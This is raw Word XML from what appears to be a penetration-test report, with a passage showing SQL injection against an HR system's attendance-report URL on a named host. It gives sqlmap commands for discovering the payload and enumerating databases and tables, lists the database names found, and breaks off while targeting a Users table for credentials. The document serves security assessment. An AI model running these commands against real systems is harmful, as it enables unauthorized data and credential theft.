        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6E9A0235" wp14:editId="5220E8B2">
            <wp:extent cx="4572000" cy="2011681"/>
            <wp:effectExtent l="0" t="0" r="0" b="7620"/>
            <wp:docPr id="210" name="Picture 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 computer&#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8272" t="22551" r="29266" b="44240"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4595007" cy="2021804"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="250CC62E" w14:textId="77777777" w:rsidR="00296845" w:rsidRDefault="00296845" w:rsidP="001F0A6F"/>
    <w:p w14:paraId="31F4395A" w14:textId="77777777" w:rsidR="00B040D1" w:rsidRDefault="00B040D1">
      <w:pPr>
        <w:spacing w:line="259" w:lineRule="auto"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E05F11F" w14:textId="5FAA0D11" w:rsidR="001F0A6F" w:rsidRDefault="001F0A6F" w:rsidP="009A28B6">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Once the cookie was obtained, enumeration of the databases can proceed. Using the command below, SQLmap automatically discovers the payload which can be used to </w:t>
      </w:r>
      <w:r w:rsidR="004A11A3">
        <w:t>inject</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> the database. </w:t>
      </w:r>
      <w:r w:rsidRPr="00236B30">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>‘*’</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> refers to the injection point. Since the values of the parameter </w:t>
      </w:r>
      <w:r w:rsidR="00DC40A3">
        <w:t>are</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> separated by </w:t>
      </w:r>
      <w:r w:rsidRPr="00236B30">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>‘+-+’</w:t>
      </w:r>
      <w:r>
        <w:t>, injection would occur after the second value.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9016"/>
      </w:tblGrid>
      <w:tr w:rsidR="001F0A6F" w14:paraId="7C5344D5" w14:textId="77777777" w:rsidTr="00E16B00">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9016" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="550001D6" w14:textId="77777777" w:rsidR="001F0A6F" w:rsidRDefault="001F0A6F" w:rsidP="00740DA1">
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r w:rsidRPr="007337A6">
              <w:t>python3 sqlmap.py --timeout 100 --random-agent --cookie="</w:t>
            </w:r>
            <w:r w:rsidRPr="007337A6">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>&lt;ci_session&gt;</w:t>
            </w:r>
            <w:r w:rsidRPr="007337A6">
              <w:t>" -u https://hrcms-admin.tri-niche.com/attendance_report_emp?startend=2022-01-17+-+2022-01-17</w:t>
            </w:r>
            <w:r w:rsidRPr="007337A6">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>*</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="21849445" w14:textId="77777777" w:rsidR="001F0A6F" w:rsidRDefault="001F0A6F" w:rsidP="001F0A6F"/>
    <w:p w14:paraId="7638DC53" w14:textId="77777777" w:rsidR="001F0A6F" w:rsidRDefault="001F0A6F" w:rsidP="009A28B6">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="04159CB5" wp14:editId="6E7924EC">
            <wp:extent cx="6056512" cy="3407434"/>
            <wp:effectExtent l="0" t="0" r="1905" b="254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82995" cy="3422334"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="44FE1F64" w14:textId="77777777" w:rsidR="00953DAD" w:rsidRDefault="00953DAD" w:rsidP="00953DAD"/>
    <w:p w14:paraId="49ED87F3" w14:textId="77777777" w:rsidR="00B040D1" w:rsidRDefault="00B040D1">
      <w:pPr>
        <w:spacing w:line="259" w:lineRule="auto"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E69645E" w14:textId="3A2AB5EA" w:rsidR="001F0A6F" w:rsidRDefault="001F0A6F" w:rsidP="009A28B6">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>When the payload is successful</w:t>
      </w:r>
      <w:r w:rsidR="00284785">
        <w:t>ly discovered</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, the next step is </w:t>
      </w:r>
      <w:r w:rsidR="007524AC">
        <w:t xml:space="preserve">to </w:t>
      </w:r>
      <w:r>
        <w:t>enumerate the databases which can be done using the following command:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9016"/>
      </w:tblGrid>
      <w:tr w:rsidR="001F0A6F" w14:paraId="26164171" w14:textId="77777777" w:rsidTr="00E16B00">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9016" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2C3C730B" w14:textId="77777777" w:rsidR="001F0A6F" w:rsidRDefault="001F0A6F" w:rsidP="00740DA1">
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t>p</w:t>
            </w:r>
            <w:r w:rsidRPr="00DA76B8">
              <w:t>ython</w:t>
            </w:r>
            <w:r>
              <w:t>3</w:t>
            </w:r>
            <w:r w:rsidRPr="00DA76B8">
              <w:t xml:space="preserve"> sqlmap.py --timeout 100 --random-agent --cookie</w:t>
            </w:r>
            <w:r w:rsidRPr="008E3137">
              <w:t xml:space="preserve">="&lt;ci_session&gt;" </w:t>
            </w:r>
            <w:r w:rsidRPr="00DA76B8">
              <w:t xml:space="preserve">-u </w:t>
            </w:r>
            <w:r w:rsidRPr="008E3137">
              <w:t>https://hrcms-admin.tri-niche.com/attendance_report_emp?startend=2022-01-17+-+2022-01-17*</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> --dbs</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="725B9DD2" w14:textId="3EB7FE7B" w:rsidR="00F24323" w:rsidRDefault="00F24323">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="337A60C5" w14:textId="7A342800" w:rsidR="001F0A6F" w:rsidRDefault="001F0A6F" w:rsidP="001F0A6F">
      <w:r>
        <w:t xml:space="preserve">As seen below, </w:t>
      </w:r>
      <w:r w:rsidR="00FE5BAA">
        <w:t>3 interesting</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> databases were discovered.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78DF3F2D" w14:textId="3DEF795E" w:rsidR="001F0A6F" w:rsidRDefault="00A20A95" w:rsidP="009A28B6">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251658322" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="55C2EC33" wp14:editId="1680DB64">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>266700</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>2672715</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="752475" cy="2000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7524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EE521F">
              <v:rect id="Rectangle 197" style="position:absolute;margin-left:21pt;margin-top:210.45pt;width:59.25pt;height:15.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FFD0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"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="001F0A6F">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6EDD6DC9" wp14:editId="432EDD99">
            <wp:extent cx="5410779" cy="3044141"/>
            <wp:effectExtent l="0" t="0" r="0" b="4445"/>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23792" cy="3051462"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="GridTable4"/>
        <w:tblW w:w="5000" w:type="pct"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="583"/>
        <w:gridCol w:w="8767"/>
      </w:tblGrid>
      <w:tr w:rsidR="00464BC9" w14:paraId="406B8423" w14:textId="77777777" w:rsidTr="00102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4CE1270A" w14:textId="77777777" w:rsidR="00464BC9" w:rsidRDefault="00464BC9" w:rsidP="00324C73">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>S/N</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4688" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="74A3867E" w14:textId="77777777" w:rsidR="00464BC9" w:rsidRDefault="00464BC9" w:rsidP="00324C73">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:cnfStyle w:val="100000000000" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:t>Databases Found</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00464BC9" w14:paraId="68FD4556" w14:textId="77777777" w:rsidTr="00102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77B90FFF" w14:textId="77777777" w:rsidR="00464BC9" w:rsidRPr="006D6EDC" w:rsidRDefault="00464BC9" w:rsidP="00324C73">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4688" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="11A7AF50" w14:textId="77777777" w:rsidR="00464BC9" w:rsidRPr="003A2E1B" w:rsidRDefault="00464BC9" w:rsidP="00324C73">
            <w:pPr>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r w:rsidRPr="003A2E1B">
              <w:t>trindrdb_hrcms</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00464BC9" w14:paraId="31C8E22A" w14:textId="77777777" w:rsidTr="001025B4">
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="312" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="5759D3B3" w14:textId="77777777" w:rsidR="00464BC9" w:rsidRPr="006D6EDC" w:rsidRDefault="00464BC9" w:rsidP="00324C73">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4688" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="2C1B639A" w14:textId="77777777" w:rsidR="00464BC9" w:rsidRPr="003A2E1B" w:rsidRDefault="00464BC9" w:rsidP="00324C73">
            <w:pPr>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r w:rsidRPr="003A2E1B">
              <w:t>trindrdb_hrcms2</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00464BC9" w14:paraId="4C12C46E" w14:textId="77777777" w:rsidTr="00102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02992939" w14:textId="77777777" w:rsidR="00464BC9" w:rsidRPr="006D6EDC" w:rsidRDefault="00464BC9" w:rsidP="00324C73">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4688" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="48CF1984" w14:textId="77777777" w:rsidR="00464BC9" w:rsidRPr="003A2E1B" w:rsidRDefault="00464BC9" w:rsidP="00324C73">
            <w:pPr>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r w:rsidRPr="003A2E1B">
              <w:t>trindrdb_triniche_hrafg</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2787AAD8" w14:textId="77777777" w:rsidR="001F0A6F" w:rsidRDefault="001F0A6F" w:rsidP="001F0A6F"/>
    <w:p w14:paraId="69A87FD0" w14:textId="77777777" w:rsidR="00B040D1" w:rsidRDefault="00B040D1">
      <w:pPr>
        <w:spacing w:line="259" w:lineRule="auto"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AB1DFF0" w14:textId="01490744" w:rsidR="001F0A6F" w:rsidRDefault="001F0A6F" w:rsidP="001F0A6F">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>The database tables can be enumerated using the following command:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9016"/>
      </w:tblGrid>
      <w:tr w:rsidR="001F0A6F" w14:paraId="5C7DCE63" w14:textId="77777777" w:rsidTr="00E16B00">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9016" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="34E8A7E5" w14:textId="00108691" w:rsidR="001F0A6F" w:rsidRDefault="001F0A6F" w:rsidP="00740DA1">
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t>p</w:t>
            </w:r>
            <w:r w:rsidRPr="00DA76B8">
              <w:t>ython</w:t>
            </w:r>
            <w:r>
              <w:t>3</w:t>
            </w:r>
            <w:r w:rsidRPr="00DA76B8">
              <w:t xml:space="preserve"> sqlmap.py --timeout 100 --random-agent --cookie</w:t>
            </w:r>
            <w:r w:rsidRPr="008E3137">
              <w:t xml:space="preserve">="&lt;ci_session&gt;" </w:t>
            </w:r>
            <w:r w:rsidRPr="00DA76B8">
              <w:t xml:space="preserve">-u </w:t>
            </w:r>
            <w:r w:rsidRPr="008E3137">
              <w:t>https://hrcms-admin.tri-niche.com/attendance_report_emp?startend=2022-01-17+-+2022-01-17*</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> --tables -D &lt;</w:t>
            </w:r>
            <w:r w:rsidR="005C7BCF">
              <w:t>DATABASE</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> NAME&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="61638FC5" w14:textId="77777777" w:rsidR="001F0A6F" w:rsidRDefault="001F0A6F" w:rsidP="001F0A6F"/>
    <w:p w14:paraId="470D1F61" w14:textId="40840C77" w:rsidR="00657C60" w:rsidRDefault="00657C60" w:rsidP="001F0A6F">
      <w:r>
        <w:t xml:space="preserve">Refer to </w:t>
      </w:r>
      <w:hyperlink w:anchor="_Database_and_Tables" w:history="1">
        <w:r w:rsidRPr="008B6579">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>Appendix C</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> for the high-level view of the databases and its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120"/>
        <w:gridCol w:w="3060"/>
      </w:tblGrid>
      <w:tr w:rsidR="001F0A6F" w14:paraId="0FBA5208" w14:textId="77777777" w:rsidTr="00D33C5B">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3126" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="438F504F" w14:textId="396E8BEA" w:rsidR="001F0A6F" w:rsidRDefault="00867334" w:rsidP="00E16B00">
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <mc:AlternateContent>
                <mc:Choice Requires="wps">
                  <w:drawing>
                    <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251658323" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="2CB99978" wp14:editId="3E9F43ED">
                      <wp:simplePos x="0" y="0"/>
                      <wp:positionH relativeFrom="column">
                        <wp:posOffset>-10258</wp:posOffset>
                      </wp:positionH>
                      <wp:positionV relativeFrom="paragraph">
                        <wp:posOffset>873760</wp:posOffset>
                      </wp:positionV>
                      <wp:extent cx="527539" cy="688731"/>
                      <wp:effectExtent l="0" t="0" r="25400" b="16510"/>
                      <wp:wrapNone/>
                      <wp:docPr id="201" name="Rectangle 201"/>
                      <wp:cNvGraphicFramePr/>
                      <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                        <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                          <wps:wsp>
                            <wps:cNvSpPr/>
                            <wps:spPr>
                              <a:xfrm>
                                <a:off x="0" y="0"/>
                                <a:ext cx="527539" cy="6887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154A51">
                    <v:rect id="Rectangle 201" style="position:absolute;margin-left:-.8pt;margin-top:68.8pt;width:41.55pt;height:54.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A513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2jhAIAAGg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"/>
                  </w:pict>
                </mc:Fallback>
              </mc:AlternateContent>
            </w:r>
            <w:r w:rsidR="001F0A6F">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3523BD1E" wp14:editId="371AFB12">
                  <wp:extent cx="1880721" cy="1821266"/>
                  <wp:effectExtent l="0" t="0" r="5715" b="7620"/>
                  <wp:docPr id="249" name="Picture 24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computer screen capture&#10;&#10;Description automatically generated with medium confidenc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41914"/>
                          <a:stretch/>
                        </pic:blipFill>
                        <pic:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="1922026" cy="1861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6" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6C08B512" w14:textId="3EFC6AA9" w:rsidR="001F0A6F" w:rsidRDefault="00867334" w:rsidP="00E16B00">
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <mc:AlternateContent>
                <mc:Choice Requires="wps">
                  <w:drawing>
                    <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251658324" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="74949F45" wp14:editId="014B2BD6">
                      <wp:simplePos x="0" y="0"/>
                      <wp:positionH relativeFrom="column">
                        <wp:posOffset>-7034</wp:posOffset>
                      </wp:positionH>
                      <wp:positionV relativeFrom="paragraph">
                        <wp:posOffset>469851</wp:posOffset>
                      </wp:positionV>
                      <wp:extent cx="383931" cy="1066800"/>
                      <wp:effectExtent l="0" t="0" r="16510" b="19050"/>
                      <wp:wrapNone/>
                      <wp:docPr id="216" name="Rectangle 216"/>
                      <wp:cNvGraphicFramePr/>
                      <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                        <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                          <wps:wsp>
                            <wps:cNvSpPr/>
                            <wps:spPr>
                              <a:xfrm>
                                <a:off x="0" y="0"/>
                                <a:ext cx="383931" cy="1066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509301">
                    <v:rect id="Rectangle 216" style="position:absolute;margin-left:-.55pt;margin-top:37pt;width:30.25pt;height:84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5E3F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"/>
                  </w:pict>
                </mc:Fallback>
              </mc:AlternateContent>
            </w:r>
            <w:r w:rsidR="001F0A6F">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="211EACD8" wp14:editId="30D9A300">
                  <wp:extent cx="1847291" cy="1798320"/>
                  <wp:effectExtent l="0" t="0" r="635" b="0"/>
                  <wp:docPr id="250" name="Picture 25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omputer screen capture&#10;&#10;Description automatically generated with medium confidence"/>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42219"/>
                          <a:stretch/>
                        </pic:blipFill>
                        <pic:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="1878136" cy="1828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8" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="25177398" w14:textId="2E4F4598" w:rsidR="001F0A6F" w:rsidRDefault="00867334" w:rsidP="00E16B00">
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <mc:AlternateContent>
                <mc:Choice Requires="wps">
                  <w:drawing>
                    <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251658325" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="36B3D185" wp14:editId="36CFD013">
                      <wp:simplePos x="0" y="0"/>
                      <wp:positionH relativeFrom="column">
                        <wp:posOffset>-1172</wp:posOffset>
                      </wp:positionH>
                      <wp:positionV relativeFrom="paragraph">
                        <wp:posOffset>478643</wp:posOffset>
                      </wp:positionV>
                      <wp:extent cx="386861" cy="1049216"/>
                      <wp:effectExtent l="0" t="0" r="13335" b="17780"/>
                      <wp:wrapNone/>
                      <wp:docPr id="219" name="Rectangle 219"/>
                      <wp:cNvGraphicFramePr/>
                      <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                        <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                          <wps:wsp>
                            <wps:cNvSpPr/>
                            <wps:spPr>
                              <a:xfrm>
                                <a:off x="0" y="0"/>
                                <a:ext cx="386861" cy="10492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3D11F4">
                    <v:rect id="Rectangle 219" style="position:absolute;margin-left:-.1pt;margin-top:37.7pt;width:30.45pt;height:82.6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5EF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"/>
                  </w:pict>
                </mc:Fallback>
              </mc:AlternateContent>
            </w:r>
            <w:r w:rsidR="001F0A6F">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="284F0A3F" wp14:editId="7B48E528">
                  <wp:extent cx="1807658" cy="1798720"/>
                  <wp:effectExtent l="0" t="0" r="2540" b="0"/>
                  <wp:docPr id="251" name="Picture 2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screenshot of a computer&#10;&#10;Description automatically generated with medium confidenc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43470"/>
                          <a:stretch/>
                        </pic:blipFill>
                        <pic:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="1826681" cy="1817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0A6F" w14:paraId="4C0CD554" w14:textId="77777777" w:rsidTr="00D33C5B">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3126" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="79E9BF24" w14:textId="77777777" w:rsidR="001F0A6F" w:rsidRDefault="001F0A6F" w:rsidP="00E16B00">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t>Tables in trindrdb_hrcms</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3126" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1756B7CD" w14:textId="77777777" w:rsidR="001F0A6F" w:rsidRDefault="001F0A6F" w:rsidP="00E16B00">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t>Tables in trindrdb_hrcms2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3098" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="74D5E05A" w14:textId="00A75407" w:rsidR="001F0A6F" w:rsidRDefault="001F0A6F" w:rsidP="00E16B00">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t>Tables in trindrdb_triniche_hrafg</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6C98D89B" w14:textId="0FFD9DB3" w:rsidR="001F0A6F" w:rsidRDefault="001F0A6F" w:rsidP="00657C60">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1F8AAD2F" w14:textId="77777777" w:rsidR="00B040D1" w:rsidRDefault="00B040D1">
      <w:pPr>
        <w:spacing w:line="259" w:lineRule="auto"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EA557BF" w14:textId="0E04A52F" w:rsidR="00090B47" w:rsidRDefault="00E94E3B" w:rsidP="00447E29">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:r w:rsidR="003C45C4">
        <w:t>U</w:t>
      </w:r>
      <w:r w:rsidR="00090B47">
        <w:t xml:space="preserve">sers table was discovered in </w:t>
      </w:r>
      <w:r w:rsidR="003C45C4">
        <w:t>trindrdb_hrcms</w:t>
      </w:r>
      <w:r w:rsidR="008B6579">
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidR="003C45C4">
        <w:t xml:space="preserve"> database which might reveal sensitive information such as user credentials. Using the following command </w:t>
      </w:r>
      <w:r w:rsidR="00A518A0">
        <w:t xml:space="preserve">would enumerate the columns in the </w:t>
      </w:r>
      <w:r w:rsidR="00421669">
        <w:t xml:space="preserve">table. For this exploit, a list of common column names </w:t>
      </w:r>
      <w:r w:rsidR="00F96084">
